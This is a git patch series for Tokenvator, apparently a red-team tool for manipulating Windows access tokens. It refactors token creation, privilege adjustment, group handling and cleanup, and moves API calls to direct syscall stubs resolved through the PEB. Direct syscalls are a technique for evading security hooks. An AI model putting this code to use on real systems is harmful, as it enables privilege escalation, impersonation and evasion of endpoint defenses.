             Winnt._TOKEN_PRIMARY_GROUP tokenPrimaryGroup;
-            ct.CreateTokenGroups(domain, username, out tokenGroups, out tokenPrimaryGroup, groups.Split(','));
-            /*
-            TokenInformation ti = new TokenInformation(hWorkingToken);
-            ti.GetTokenGroups();
-            Ntifs._TOKEN_GROUPS tokenGroups = ti.tokenGroups;
-            
-            int extraGroups = tokenGroups.GroupCount;
-
-            uint groupsAttributes = (uint)(Winnt.SE_GROUP_ENABLED | Winnt.SE_GROUP_ENABLED_BY_DEFAULT | Winnt.SE_GROUP_MANDATORY);
-
-            Ntifs._TOKEN_GROUPS tokenGroupsCopy = new Ntifs._TOKEN_GROUPS();
-            tokenGroupsCopy.Initialize();
-
-            for (int i = 0; i < tokenGroups.GroupCount; i++)
+            using (CreateTokens ct = new CreateTokens(hWorkingToken))
             {
-                tokenGroupsCopy.Groups[i] = tokenGroups.Groups[i];
-            }
-
-            foreach (string group in groups.Split(new string[] { "," }, StringSplitOptions.RemoveEmptyEntries))
-            {
-                Console.WriteLine(group);
-                string d = Environment.MachineName;
-                string groupname = group;
-                if (group.Contains(@"\"))
-                {
-                    string[] split = group.Split('\\');
-                    d = split[0];
-                    groupname = split[1];
-                }
-                Console.WriteLine(groupname);
-                string sid = new NTAccount(d, groupname).Translate(typeof(SecurityIdentifier)).Value;
-                Console.WriteLine(sid);
-                tokenGroupsCopy.Groups[++extraGroups].Sid = Marshal.AllocHGlobal(Marshal.SizeOf(typeof(IntPtr)));
-                Console.WriteLine(extraGroups);
-                CreateTokens.InitializeSid(sid, ref tokenGroupsCopy.Groups[extraGroups].Sid);
-                tokenGroupsCopy.Groups[extraGroups].Attributes = groupsAttributes;
+                ct.CreateTokenGroups(domain, username, out tokenGroups, out tokenPrimaryGroup, groups.Split(','));
             }
-            tokenGroupsCopy.GroupCount = extraGroups;
-            */
 
             if (!advapi32.LogonUserExExW(
                 username, domain, password, 
-                logonType, Winbase.LOGON_PROVIDER.LOGON32_PROVIDER_DEFAULT, 
-                ref tokenGroups, out hExistingToken, 
+                logonType, 
+                Winbase.LOGON_PROVIDER.LOGON32_PROVIDER_DEFAULT, 
+                ref tokenGroups, 
+                out hExistingToken, 
                 IntPtr.Zero, IntPtr.Zero, IntPtr.Zero, IntPtr.Zero))
             {
                 Misc.GetWin32Error("LogonUserExExW");
@@ -425,6 +380,12 @@ public void LogonUser(string domain, string username, string password, string gr
                 }
             }
 
+            using (DesktopACL da = new DesktopACL())
+            {
+                da.OpenWindow();
+                da.OpenDesktop();
+            }
+
             if (string.IsNullOrEmpty(command))
             {
                 SetWorkingTokenToRemote();
@@ -444,7 +405,8 @@ public void LogonUser(string domain, string username, string password, string gr
 
         ////////////////////////////////////////////////////////////////////////////////
         // Can be use to remove groups, adding groups would require a new token 
-        // Next Release
+        // Next Release 
+        // Change Mainloop.Modules method name
         //https://docs.microsoft.com/en-us/windows/win32/api/securitybaseapi/nf-securitybaseapi-adjusttokengroups
         ////////////////////////////////////////////////////////////////////////////////
         public void SetTokenGroup(string group, bool isSID)
@@ -505,25 +467,31 @@ public void SetTokenGroup(string group, bool isSID)
             }
 
             ti.GetTokenGroups();
+            ti.Dispose();
 
             Console.WriteLine(returnLength);
-
-
         }
 
         ////////////////////////////////////////////////////////////////////////////////
-        // 
+        /// <summary>
+        /// Updates a privilege on an impersonation / thread token
+        /// No Conversions Required
+        /// </summary>
+        /// <param name="privilege"></param>
+        /// <param name="attribute"></param>
         ////////////////////////////////////////////////////////////////////////////////
         public void SetThreadTokenPrivilege(string privilege, Winnt.TokenPrivileges attribute)
         {
             foreach (uint t in threads)
             {
                 Console.WriteLine("[*] Thread ID: " + t);
-                if (OpenThreadToken(t, Winnt.TOKEN_ALL_ACCESS))
+                if (!OpenThreadToken(t, Winnt.TOKEN_ALL_ACCESS))
                 {
-                    SetWorkingTokenToThreadToken();
-                    SetTokenPrivilege(privilege, attribute);
+                    continue;
                 }
+
+                SetWorkingTokenToThreadToken();
+                SetTokenPrivilege(privilege, attribute);
             }
         }
 
@@ -531,6 +499,8 @@ public void SetThreadTokenPrivilege(string privilege, Winnt.TokenPrivileges attr
         // Sets a Token to have a specified privilege
         // http://www.leeholmes.com/blog/2010/09/24/adjusting-token-privileges-in-powershell/
         // https://support.microsoft.com/en-us/help/131065/how-to-obtain-a-handle-to-any-process-with-sedebugprivilege
+        //
+        // This will be a fun conversion
         ////////////////////////////////////////////////////////////////////////////////
         public bool SetTokenPrivilege(string privilege, Winnt.TokenPrivileges attribute)
         {
@@ -571,6 +541,8 @@ public bool SetTokenPrivilege(string privilege, Winnt.TokenPrivileges attribute)
 
         ////////////////////////////////////////////////////////////////////////////////
         // Updates the token session ID to the specified session
+        // Does this even work?
+        // Convert to syscalls
         ////////////////////////////////////////////////////////////////////////////////
         public bool SetTokenSessionId(int sessionId)
         {
diff --git a/Tokenvator/Resources/CommandLineParsing.cs b/Tokenvator/Resources/CommandLineParsing.cs
index e62becc..1998123 100644
--- a/Tokenvator/Resources/CommandLineParsing.cs
+++ b/Tokenvator/Resources/CommandLineParsing.cs
@@ -20,6 +20,7 @@ public sealed class CommandLineParsing
         public bool Remote { get; private set; }
         public string PipeName { get; private set; }
         public bool Impersonation { get; private set; }
+        public bool Legacy { get; private set; }
 
         public static List<string> privileges = new List<string> { "SeAssignPrimaryTokenPrivilege",
             "SeAuditPrivilege", "SeBackupPrivilege", "SeChangeNotifyPrivilege", "SeCreateGlobalPrivilege",
@@ -39,6 +40,7 @@ public CommandLineParsing()
             arguments = new Dictionary<string, object>();
             Remote = false;
             Impersonation = false;
+            Legacy = false;
         }
 
         /// <summary>
@@ -47,11 +49,7 @@ public CommandLineParsing()
         /// <param name="input"></param>
         public bool Parse(string input)
         {
-            //Console.WriteLine();
-            //Console.WriteLine(input);
             input = Regex.Replace(input, "(\"[^\"]*)(\\/)+([^\"]*[^:](?!\\\\)\")", "$1\0$3");
-            //Console.WriteLine(input);
-            //Console.WriteLine();
 
             string[] argumentAndData = input.Split(new string[] { "/" }, StringSplitOptions.RemoveEmptyEntries);
 
@@ -176,6 +174,15 @@ public bool Parse(string input)
                 }
             }
 
+            if (arguments.ContainsKey("legacy"))
+            {
+                object pn;
+                if (arguments.TryGetValue("legacy", out pn))
+                {
+                    Legacy = true;
+                }
+            }
+
             return true;
         }
 
diff --git a/Tokenvator/Resources/TabComplete.cs b/Tokenvator/Resources/TabComplete.cs
index 1f87d4a..bd6cf0d 100644
--- a/Tokenvator/Resources/TabComplete.cs
+++ b/Tokenvator/Resources/TabComplete.cs
@@ -25,7 +25,7 @@ class TabComplete
 
         private readonly List<string> flags = new List<string>()
         { 
-            "All", "Command", "Filter", "Force", "Groups", "Impersonation", "Password", "Path", "Privilege", "Process", "ServiceName", "State", "Thread", "Username"        
+            "All", "Command", "Filter", "Force", "Groups", "Impersonation", "Legacy", "Password", "Path", "Privilege", "Process", "ServiceName", "State", "Thread", "Username"        
         };
 
 

From 8cefb32df1cd83fd6a9b9d646184606fcf72058e Mon Sep 17 00:00:00 2001
From: Alexander <1656007+0xbadjuju@users.noreply.github.com>
Date: Sat, 28 Aug 2021 14:08:53 -0500
Subject: [PATCH 10/36] Converting TokenManipulation to D/Invoke + Bug Fixes

---
 Tokenvator/MainLoop.Modules.cs                |  14 +-
 Tokenvator/MainLoop.cs                        |   6 +-
 .../Plugins/AccessTokens/AccessTokens.cs      |  61 ++-
 .../Plugins/AccessTokens/CreateTokens.cs      |  12 +-
 .../Plugins/AccessTokens/TokenInformation.cs  | 108 +++--
 .../Plugins/AccessTokens/TokenManipulation.cs | 446 +++++++++++++-----
 6 files changed, 447 insertions(+), 200 deletions(-)

diff --git a/Tokenvator/MainLoop.Modules.cs b/Tokenvator/MainLoop.Modules.cs
index b15d292..cbcf7af 100644
--- a/Tokenvator/MainLoop.Modules.cs
+++ b/Tokenvator/MainLoop.Modules.cs
@@ -27,7 +27,7 @@ partial class MainLoop
         ////////////////////////////////////////////////////////////////////////////////
         //
         ////////////////////////////////////////////////////////////////////////////////
-        private static void _AddGroup(CommandLineParsing cLP, IntPtr hToken)
+        private static void _DisableGroup(CommandLineParsing cLP, IntPtr hToken)
         {
             string groups;
             if (!cLP.GetData("groups", out groups))
@@ -35,14 +35,14 @@ private static void _AddGroup(CommandLineParsing cLP, IntPtr hToken)
                 return;
             }
 
-            using (TokenManipulation t = new TokenManipulation(hToken))
+            using (TokenManipulation tm = new TokenManipulation(hToken))
             {
-                if (cLP.Remote && t.OpenProcessToken(cLP.ProcessID))
-                    t.SetWorkingTokenToRemote();
+                if (cLP.Remote && tm.OpenProcessToken(cLP.ProcessID))
+                    tm.SetWorkingTokenToRemote();
                 else
-                    t.SetWorkingTokenToSelf();
+                    tm.SetWorkingTokenToSelf();
 
-                t.SetTokenGroup(groups, false);
+                tm.DisableTokenGroup(groups);
             }
         }
 
@@ -194,7 +194,7 @@ private static void _CreateToken(CommandLineParsing cLP, IntPtr hToken)
                     else
                     {
                         ct.SetWorkingTokenToSelf();
-                        ct.CreateToken(groups, cLP.Command);
+                        ct.CreateToken(cLP.Command);
                     }
                 }
             }
diff --git a/Tokenvator/MainLoop.cs b/Tokenvator/MainLoop.cs
index 6c3f8c1..2e9825e 100644
--- a/Tokenvator/MainLoop.cs
+++ b/Tokenvator/MainLoop.cs
@@ -156,9 +156,6 @@ internal void Run()
 
                 switch (action)
                 {
-                    case "add_group":
-                        _AddGroup(cLP, hToken);
-                        break;
                     case "add_privilege":
                         _AddPrivilege(cLP);
                         break;
@@ -180,6 +177,9 @@ internal void Run()
                     case "detach_filter":
                         Filters.FilterDetach(cLP);
                         break;
+                    case "disable_group":
+                        _DisableGroup(cLP, hToken);
+                        break;
                     case "disable_privilege":
                         _AlterPrivilege(cLP, hToken, Winnt.TokenPrivileges.SE_PRIVILEGE_NONE);
                         break;
diff --git a/Tokenvator/Plugins/AccessTokens/AccessTokens.cs b/Tokenvator/Plugins/AccessTokens/AccessTokens.cs
index d14bc5b..4898c2d 100644
--- a/Tokenvator/Plugins/AccessTokens/AccessTokens.cs
+++ b/Tokenvator/Plugins/AccessTokens/AccessTokens.cs
@@ -510,10 +510,33 @@ public virtual bool ImpersonateUser()
         /// <param name="handle"></param>
         /// <returns></returns>
         ////////////////////////////////////////////////////////////////////////////////
+        [SecurityCritical]
+        [HandleProcessCorruptedStateExceptions]
         protected bool CloseHandle(IntPtr handle)
         {
+            if (IntPtr.Zero == handle)
+            {
+                return true;
+            }
+
             MonkeyWorks.ntdll.NtClose fSyscallhNtClose = (MonkeyWorks.ntdll.NtClose)Marshal.GetDelegateForFunctionPointer(hNtClose, typeof(MonkeyWorks.ntdll.NtClose));
-            uint ntRetVal = fSyscallhNtClose(handle);
+
+            uint ntRetVal = 0;
+            try
+            {
+                ntRetVal = fSyscallhNtClose(handle);
+            }
+            catch (Exception ex)
+            {
+                if (!(ex is SEHException))
+                {
+                    Console.WriteLine("[-] NtCloseHandle Generated an Exception");
+                    Console.WriteLine("[-] {0}", ex.Message);
+                    return false;
+                }
+                return true;
+            }
+
             if (0 != ntRetVal)
             {
                 Misc.GetNtError("NtClose", ntRetVal);
@@ -543,36 +566,24 @@ protected bool CloseHandle(IntPtr handle)
         ////////////////////////////////////////////////////////////////////////////////
         public virtual void Dispose()
         {
-            try
+            if (IntPtr.Zero != phNewToken)
+            {                    
+                CloseHandle(phNewToken);
+            }
+            if (IntPtr.Zero != hExistingToken)
             {
-                if (IntPtr.Zero != phNewToken)
-                {                    
-                    CloseHandle(phNewToken);
-                }
-                if (IntPtr.Zero != hExistingToken)
-                {
-                    CloseHandle(hExistingToken);
-                }
-                if (IntPtr.Zero != hWorkingToken && currentProcessToken != hWorkingToken)
-                {
-                    CloseHandle(hWorkingToken);
-                }
-                if (IntPtr.Zero != hWorkingThreadToken)
-                {
-                    CloseHandle(hWorkingThreadToken);
-                }
+                CloseHandle(hExistingToken);
             }
-            catch (Exception ex)
+            if (IntPtr.Zero != hWorkingToken && currentProcessToken != hWorkingToken)
             {
-                if (!(ex is SEHException))
-                {
-                    Console.WriteLine(ex.Message);
-                }
+                CloseHandle(hWorkingToken);
             }
-            finally
+            if (IntPtr.Zero != hWorkingThreadToken)
             {
-                Disposed = true;
+                CloseHandle(hWorkingThreadToken);
             }
+
+            Disposed = true;
         }
     }
 }
diff --git a/Tokenvator/Plugins/AccessTokens/CreateTokens.cs b/Tokenvator/Plugins/AccessTokens/CreateTokens.cs
index 2fd7244..9be11b1 100644
--- a/Tokenvator/Plugins/AccessTokens/CreateTokens.cs
+++ b/Tokenvator/Plugins/AccessTokens/CreateTokens.cs
@@ -32,7 +32,7 @@ public CreateTokens(IntPtr token) : base(token)
         }
 
         //SeCreateTokenPrivilege
-        public void CreateToken(string[] groups, string command)
+        public void CreateToken(string command)
         {
             if (!_CheckPrivileges())
             {
@@ -295,7 +295,7 @@ ref ti.tokenSource
             if (0 != ntRetVal)
             {
                 Misc.GetNtError("NtCreateToken", ntRetVal);
-                new TokenInformation(phNewToken).GetTokenUser();
+                return;
             }
 
             if (string.IsNullOrEmpty(command))
@@ -303,9 +303,11 @@ ref ti.tokenSource
                 command = "cmd.exe";
             }
 
-            DesktopACL desktop = new DesktopACL();
-            desktop.OpenDesktop();
-            desktop.OpenWindow();
+            using (DesktopACL desktop = new DesktopACL())
+            {
+                desktop.OpenDesktop();
+                desktop.OpenWindow();
+            }
 
             SetWorkingTokenToNewToken();
             StartProcessAsUser(command);           
diff --git a/Tokenvator/Plugins/AccessTokens/TokenInformation.cs b/Tokenvator/Plugins/AccessTokens/TokenInformation.cs
index 691866b..ad4bc91 100644
--- a/Tokenvator/Plugins/AccessTokens/TokenInformation.cs
+++ b/Tokenvator/Plugins/AccessTokens/TokenInformation.cs
@@ -21,13 +21,22 @@ class TokenInformation : AccessTokens
         public bool tiDisposed = false;
 
         public Winnt._TOKEN_SOURCE tokenSource;
+        public IntPtr hTokenSource;
         public Ntifs._TOKEN_USER tokenUser;
+        public IntPtr hTokenUser;
         public Ntifs._TOKEN_GROUPS tokenGroups;
+        public IntPtr hTokenGroups;
         public Winnt._TOKEN_PRIVILEGES_ARRAY tokenPrivileges;
+        public IntPtr hTokenPrivileges;
         public Ntifs._TOKEN_OWNER tokenOwner;
+        public IntPtr hTokenOwner;
         public Winnt._TOKEN_PRIMARY_GROUP tokenPrimaryGroup;
+        public IntPtr hTokenPrimaryGroup;
         public Winnt._TOKEN_DEFAULT_DACL tokenDefaultDacl;
+        public IntPtr hTokenDefaultDacl;
         public Winnt._TOKEN_DEFAULT_DACL_ACL tokenDefaultDaclAcl;
+        public IntPtr hTokenElevationType;
+        public IntPtr hTokenType;
 
         private readonly IntPtr hNtQueryInformationToken;
 
@@ -64,6 +73,43 @@ public override void Dispose()
         {
             tiDisposed = true;
 
+            if (IntPtr.Zero != hTokenSource)
+            {
+                Marshal.FreeHGlobal(hTokenSource);
+            }
+            if (IntPtr.Zero != hTokenUser)
+            {
+                Marshal.FreeHGlobal(hTokenUser);
+            }
+            if (IntPtr.Zero != hTokenGroups)
+            {
+                Marshal.FreeHGlobal(hTokenGroups);
+            }
+            if (IntPtr.Zero != hTokenPrivileges)
+            {
+                Marshal.FreeHGlobal(hTokenPrivileges);
+            }
+            if (IntPtr.Zero != hTokenOwner)
+            {
+                Marshal.FreeHGlobal(hTokenOwner);
+            }
+            if (IntPtr.Zero != hTokenPrimaryGroup)
+            {
+                Marshal.FreeHGlobal(hTokenPrimaryGroup);
+            }
+            if (IntPtr.Zero != hTokenDefaultDacl)
+            {
+                Marshal.FreeHGlobal(hTokenDefaultDacl);
+            }
+            if (IntPtr.Zero != hTokenElevationType)
+            {
+                Marshal.FreeHGlobal(hTokenElevationType);
+            }
+            if (IntPtr.Zero != hTokenType)
+            {
+                Marshal.FreeHGlobal(hTokenType);
+            }
+
             base.Dispose();
         }
 
@@ -126,7 +172,7 @@ public void GetThreadPrivileges()
         ////////////////////////////////////////////////////////////////////////////////
         public bool GetTokenElevation(bool printResults)
         {
-            IntPtr hTokenElevationType = _GetTokenInformation(Winnt._TOKEN_INFORMATION_CLASS.TokenElevationType);
+            hTokenElevationType = _GetTokenInformation(Winnt._TOKEN_INFORMATION_CLASS.TokenElevationType);
             if (IntPtr.Zero == hTokenElevationType)
             {
                 return false;
@@ -181,7 +227,7 @@ public bool GetTokenElevation(bool printResults)
         public void GetTokenType()
         {
             int output = -1;
-            IntPtr hTokenType = _GetTokenInformation(Winnt._TOKEN_INFORMATION_CLASS.TokenType);
+            hTokenType = _GetTokenInformation(Winnt._TOKEN_INFORMATION_CLASS.TokenType);
             try
             {
                 output = Marshal.ReadInt32(hTokenType);
@@ -213,10 +259,6 @@ public void GetTokenType()
                         Console.WriteLine("[-] ReadInt32 Generated an Exception");
                         Console.WriteLine(ex.Message);
                     }
-                    finally
-                    {
-                        Marshal.FreeHGlobal(hTokenType);
-                    }
 
                     switch ((Winnt._SECURITY_IMPERSONATION_LEVEL)output)
                     {
@@ -251,7 +293,7 @@ public void GetTokenType()
         ////////////////////////////////////////////////////////////////////////////////
         public void GetTokenSource()
         {
-            IntPtr hTokenSource = _GetTokenInformation(Winnt._TOKEN_INFORMATION_CLASS.TokenSource);
+            hTokenSource = _GetTokenInformation(Winnt._TOKEN_INFORMATION_CLASS.TokenSource);
             try
             {
                 tokenSource = (Winnt._TOKEN_SOURCE)Marshal.PtrToStructure(hTokenSource, typeof(Winnt._TOKEN_SOURCE));
@@ -262,10 +304,6 @@ public void GetTokenSource()
                 Console.WriteLine(ex.Message);
                 return;
             }
-            finally
-            {
-                Marshal.FreeHGlobal(hTokenSource);
-            }
 
             Console.WriteLine("[+] Source: " + new string(tokenSource.SourceName));
             return;
@@ -280,7 +318,7 @@ public void GetTokenSource()
         ////////////////////////////////////////////////////////////////////////////////
         public void GetTokenUser()
         {
-            IntPtr hTokenUser = _GetTokenInformation(Winnt._TOKEN_INFORMATION_CLASS.TokenUser);
+            hTokenUser = _GetTokenInformation(Winnt._TOKEN_INFORMATION_CLASS.TokenUser);
             try
             {
                 tokenUser = (Ntifs._TOKEN_USER)Marshal.PtrToStructure(hTokenUser, typeof(Ntifs._TOKEN_USER));
@@ -291,11 +329,7 @@ public void GetTokenUser()
                 Console.WriteLine(ex.Message);
                 return;
             }
-            finally
-            {
-                Marshal.FreeHGlobal(hTokenUser);
-            }
-            
+
             Console.WriteLine("[+] User: ");
             string sid, account;
             ReadSidAndName(tokenUser.User.Sid, out sid, out account);
@@ -313,7 +347,7 @@ public void GetTokenUser()
         ////////////////////////////////////////////////////////////////////////////////
         public bool GetTokenGroups()
         {
-            IntPtr hTokenGroups = _GetTokenInformation(Winnt._TOKEN_INFORMATION_CLASS.TokenGroups);
+            hTokenGroups = _GetTokenInformation(Winnt._TOKEN_INFORMATION_CLASS.TokenGroups);
             try
             {
                 tokenGroups = (Ntifs._TOKEN_GROUPS)Marshal.PtrToStructure(hTokenGroups, typeof(Ntifs._TOKEN_GROUPS));
@@ -324,10 +358,6 @@ public bool GetTokenGroups()
                 Console.WriteLine(ex.Message);
                 return false;
             }
-            finally
-            {
-                Marshal.FreeHGlobal(hTokenGroups);
-            }
 
             Console.WriteLine("[+] Enumerated {0} Groups: ", tokenGroups.GroupCount);
             for (int i = 0; i < tokenGroups.GroupCount; i++)
@@ -352,7 +382,7 @@ public bool GetTokenGroups()
         public void GetTokenPrivileges()
         {
             Console.WriteLine("[*] Enumerating Token Privileges");
-            IntPtr hTokenPrivileges = _GetTokenInformation(Winnt._TOKEN_INFORMATION_CLASS.TokenPrivileges);
+            hTokenPrivileges = _GetTokenInformation(Winnt._TOKEN_INFORMATION_CLASS.TokenPrivileges);
             try
             {
                 tokenPrivileges = (Winnt._TOKEN_PRIVILEGES_ARRAY)Marshal.PtrToStructure(hTokenPrivileges, typeof(Winnt._TOKEN_PRIVILEGES_ARRAY));
@@ -363,10 +393,6 @@ public void GetTokenPrivileges()
                 Console.WriteLine(ex.Message);
                 return;
             }
-            finally
-            {
-                Marshal.FreeHGlobal(hTokenPrivileges);
-            }
 
             Console.WriteLine("[+] Enumerated {0} Privileges", tokenPrivileges.PrivilegeCount);
             Console.WriteLine();
@@ -401,7 +427,7 @@ public void GetTokenPrivileges()
                 // advapi32.LookupPrivilegeName(null, lpLuid, null, ref cchName);
                 // advapi32.LookupPrivilegeName(null, lpLuid, lpName, ref cchName)
                 ////////////////////////////////////////////////////////////////////////////////
-                
+
                 try
                 {
                     fLookupPrivilegeName(null, lpLuid, null, ref cchName);
@@ -441,14 +467,14 @@ public void GetTokenPrivileges()
                 // Lookup if the privilege is enable
                 // advapi32.PrivilegeCheck(hWorkingToken, ref privilegeSet, out pfResult)
                 ////////////////////////////////////////////////////////////////////////////////
-                
-                int pfResult = 0;
+
                 Winnt._PRIVILEGE_SET privilegeSet = new Winnt._PRIVILEGE_SET
                 {
                     PrivilegeCount = 1,
                     Control = Winnt.PRIVILEGE_SET_ALL_NECESSARY,
                     Privilege = new Winnt._LUID_AND_ATTRIBUTES[] { tokenPrivileges.Privileges[i] }
                 };
+                bool pfResult = false;
 
                 uint ntRetVal = 0;
                 try
@@ -464,7 +490,7 @@ public void GetTokenPrivileges()
                 {
                     Marshal.FreeHGlobal(lpLuid);
                 }
-                
+
                 if (0 != ntRetVal)
                 {
                     Misc.GetNtError("NtPrivilegeCheck", ntRetVal);
@@ -484,7 +510,7 @@ public void GetTokenPrivileges()
         ////////////////////////////////////////////////////////////////////////////////
         public void GetTokenOwner()
         {
-            IntPtr hTokenOwner = _GetTokenInformation(Winnt._TOKEN_INFORMATION_CLASS.TokenOwner);
+            hTokenOwner = _GetTokenInformation(Winnt._TOKEN_INFORMATION_CLASS.TokenOwner);
             try
             {
                 tokenOwner = (Ntifs._TOKEN_OWNER)Marshal.PtrToStructure(hTokenOwner, typeof(Ntifs._TOKEN_OWNER));
@@ -495,10 +521,6 @@ public void GetTokenOwner()
                 Console.WriteLine(ex.Message);
                 return;
             }
-            finally
-            {
-                Marshal.FreeHGlobal(hTokenOwner);
-            }
 
             Console.WriteLine("[+] Owner: ");
             string sid, account;
@@ -516,7 +538,7 @@ public void GetTokenOwner()
         ////////////////////////////////////////////////////////////////////////////////
         public void GetTokenPrimaryGroup()
         {
-            IntPtr hTokenPrimaryGroup = _GetTokenInformation(Winnt._TOKEN_INFORMATION_CLASS.TokenPrimaryGroup);
+            hTokenPrimaryGroup = _GetTokenInformation(Winnt._TOKEN_INFORMATION_CLASS.TokenPrimaryGroup);
             try
             {
                 tokenPrimaryGroup = (Winnt._TOKEN_PRIMARY_GROUP)Marshal.PtrToStructure(hTokenPrimaryGroup, typeof(Winnt._TOKEN_PRIMARY_GROUP));
@@ -527,10 +549,6 @@ public void GetTokenPrimaryGroup()
                 Console.WriteLine(ex.Message);
                 return;
             }
-            finally
-            {
-                Marshal.FreeHGlobal(hTokenPrimaryGroup);
-            }
 
             string primaryGroupSid, primaryGroupName;
             ReadSidAndName(tokenPrimaryGroup.PrimaryGroup, out primaryGroupSid, out primaryGroupName);
@@ -548,7 +566,7 @@ public void GetTokenPrimaryGroup()
         ////////////////////////////////////////////////////////////////////////////////
         public void GetTokenDefaultDacl()
         {
-            IntPtr hTokenDefaultDacl = _GetTokenInformation(Winnt._TOKEN_INFORMATION_CLASS.TokenDefaultDacl);
+            hTokenDefaultDacl = _GetTokenInformation(Winnt._TOKEN_INFORMATION_CLASS.TokenDefaultDacl);
             try
             {
                 tokenDefaultDacl = (Winnt._TOKEN_DEFAULT_DACL)Marshal.PtrToStructure(hTokenDefaultDacl, typeof(Winnt._TOKEN_DEFAULT_DACL));
@@ -564,10 +582,6 @@ public void GetTokenDefaultDacl()
                 Console.WriteLine(ex.Message);
                 return;
             }
-            finally
-            {
-                Marshal.FreeHGlobal(hTokenDefaultDacl);
-            }
 
             string primaryGroup = Marshal.PtrToStringUni(tokenPrimaryGroup.PrimaryGroup);
             Console.WriteLine("[+] ACL Count: {0}", tokenDefaultDaclAcl.DefaultDacl.AceCount);
@@ -718,7 +732,7 @@ public bool CheckTokenPrivilege(string privilegeName, out bool exists, out bool
                     Control = Winnt.PRIVILEGE_SET_ALL_NECESSARY,
                     Privilege = new Winnt._LUID_AND_ATTRIBUTES[] { tokenPrivileges.Privileges[i] }
                 };
-                int pfResult = 0;
+                bool pfResult = false;
 
                 uint ntRetVal = fSyscallNtPrivilegeCheck(hWorkingToken, ref privilegeSet, ref pfResult);
 
diff --git a/Tokenvator/Plugins/AccessTokens/TokenManipulation.cs b/Tokenvator/Plugins/AccessTokens/TokenManipulation.cs
index b8ba92f..6722c01 100644
--- a/Tokenvator/Plugins/AccessTokens/TokenManipulation.cs
+++ b/Tokenvator/Plugins/AccessTokens/TokenManipulation.cs
@@ -1,7 +1,9 @@
 using System;
 using System.Collections.Generic;
 using System.Diagnostics;
+using System.Runtime.ExceptionServices;
 using System.Runtime.InteropServices;
+using System.Security;
 using System.Security.Principal;
 using System.Text;
 
@@ -12,8 +14,7 @@
 using Tokenvator.Plugins.Execution;
 
 using MonkeyWorks.Unmanaged.Headers;
-using MonkeyWorks.Unmanaged.Libraries;
-
+//using MonkeyWorks.Unmanaged.Libraries;
 
 namespace Tokenvator.Plugins.AccessTokens
 {
@@ -67,56 +68,110 @@ public override void Dispose()
             Dispose();
         }
 
-        ////////////////////////////////////////////////////////////////////////////////
         /// <summary>
         /// Should be able to replace with a single syscall
         /// </summary>
-        ////////////////////////////////////////////////////////////////////////////////
         public void DisableAndRemoveAllTokenPrivileges()
         {
+            IntPtr hNtQueryInformationToken = Generic.GetSyscallStub("NtQueryInformationToken");
+            MonkeyWorks.ntdll.NtQueryInformationToken fSyscallNtQueryInformationToken = (MonkeyWorks.ntdll.NtQueryInformationToken)Marshal.GetDelegateForFunctionPointer(hNtQueryInformationToken, typeof(MonkeyWorks.ntdll.NtQueryInformationToken));
+
+            IntPtr hadvapi32 = Generic.GetPebLdrModuleEntry("advapi32.dll");
+            IntPtr hLookupPrivilegeNameW = Generic.GetExportAddress(hadvapi32, "LookupPrivilegeNameW");
+            MonkeyWorks.advapi32.LookupPrivilegeNameW fLookupPrivilegeNameW = (MonkeyWorks.advapi32.LookupPrivilegeNameW)Marshal.GetDelegateForFunctionPointer(hLookupPrivilegeNameW, typeof(MonkeyWorks.advapi32.LookupPrivilegeNameW));
+
             IntPtr hNtAdjustPrivilegesToken = Generic.GetSyscallStub("NtAdjustPrivilegesToken");
             MonkeyWorks.ntdll.NtAdjustPrivilegesToken fSyscallNtAdjustPrivilegesToken = (MonkeyWorks.ntdll.NtAdjustPrivilegesToken)Marshal.GetDelegateForFunctionPointer(hNtAdjustPrivilegesToken, typeof(MonkeyWorks.ntdll.NtAdjustPrivilegesToken));
 
+            IntPtr hNtPrivilegeCheck = Generic.GetSyscallStub("NtPrivilegeCheck");
+            MonkeyWorks.ntdll.NtPrivilegeCheck fSyscallNtPrivilegeCheck = (MonkeyWorks.ntdll.NtPrivilegeCheck)Marshal.GetDelegateForFunctionPointer(hNtPrivilegeCheck, typeof(MonkeyWorks.ntdll.NtPrivilegeCheck));
+
             Winnt._TOKEN_PRIVILEGES_ARRAY newTokenPrivileges = new Winnt._TOKEN_PRIVILEGES_ARRAY();
             Winnt._TOKEN_PRIVILEGES_ARRAY previousTokenPrivileges = new Winnt._TOKEN_PRIVILEGES_ARRAY();
 
-            //fSyscallNtAdjustPrivilegesToken(hWorkingToken, true, );
-
             ////////////////////////////////////////////////////////////////////////////////
+            // Query the tokens for the privileges that are to be removed
+            // advapi32.GetTokenInformation(hExistingToken, Winnt._TOKEN_INFORMATION_CLASS.TokenPrivileges, IntPtr.Zero, 0, out TokenInfLength);
+            // advapi32.GetTokenInformation(hExistingToken, Winnt._TOKEN_INFORMATION_CLASS.TokenPrivileges, lpTokenInformation, TokenInfLength, out TokenInfLength)
+            ////////////////////////////////////////////////////////////////////////////////
+            
+            #region QueryTokenInformation
             Console.WriteLine("[*] Enumerating Token Privileges");
-            uint TokenInfLength = 0;
-            advapi32.GetTokenInformation(hExistingToken, Winnt._TOKEN_INFORMATION_CLASS.TokenPrivileges, IntPtr.Zero, 0, out TokenInfLength);
+            ulong tokenInfLength = 0;
+            
+            try
+            {
+                fSyscallNtQueryInformationToken(hWorkingToken, Winnt._TOKEN_INFORMATION_CLASS.TokenPrivileges, IntPtr.Zero, 0, ref tokenInfLength);
+            }
+            catch (Exception ex)
+            {
+                Console.WriteLine("[-] LogonUserExExW Generated an Exception");
+                Console.WriteLine("[-] {0}", ex.Message);
+                return;
+            }
 
-            if (TokenInfLength < 0 || TokenInfLength > int.MaxValue)
+            if (tokenInfLength < 0 || tokenInfLength > ulong.MaxValue)
             {
-                Misc.GetWin32Error("GetTokenInformation - 1 " + TokenInfLength);
+                Misc.GetWin32Error("GetTokenInformation - 1 " + tokenInfLength);
                 return;
             }
             Console.WriteLine("[*] GetTokenInformation - Pass 1");
-            IntPtr lpTokenInformation = Marshal.AllocHGlobal((int)TokenInfLength);
+            IntPtr lpTokenInformation = Marshal.AllocHGlobal((int)tokenInfLength);
 
-            ////////////////////////////////////////////////////////////////////////////////
-            if (!advapi32.GetTokenInformation(hExistingToken, Winnt._TOKEN_INFORMATION_CLASS.TokenPrivileges, lpTokenInformation, TokenInfLength, out TokenInfLength))
+            uint ntRetVal = 0;
+            try
             {
-                Misc.GetWin32Error("GetTokenInformation - 2 " + TokenInfLength);
+                ntRetVal = fSyscallNtQueryInformationToken(hWorkingToken, Winnt._TOKEN_INFORMATION_CLASS.TokenPrivileges, lpTokenInformation, 0, ref tokenInfLength);
+            }
+            catch (Exception ex)
+            {
+                Console.WriteLine("[-] LogonUserExExW Generated an Exception");
